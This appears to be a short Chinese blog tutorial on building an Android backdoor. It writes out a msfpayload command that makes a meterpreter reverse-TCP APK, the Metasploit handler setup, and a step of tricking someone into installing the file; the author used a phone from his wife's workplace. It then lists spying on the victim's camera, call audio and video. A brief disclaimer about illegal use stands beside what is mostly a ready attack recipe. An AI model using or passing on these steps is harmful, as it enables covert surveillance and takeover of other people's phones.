1.首先生成后門程序
msfpayload android/meterpreter/reverse_tcp LHOST=172.16.1.109 LPORT=4444 R > /root/Desktop/apk.apk
2.打開metasploit
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.1.109
3.誘導其安裝后門文件(我用我老婆單位發的手機,真是爛?。?/p>
4.然后我們就可以為所欲為
wKiom1MwNWug21ASAAOCJB3aECM203.jpg
看攝像頭啊,截取通話語音啊,視頻快照啊,當然我們是不用做違法用途的。
下一篇:一個典型僵尸網絡淺析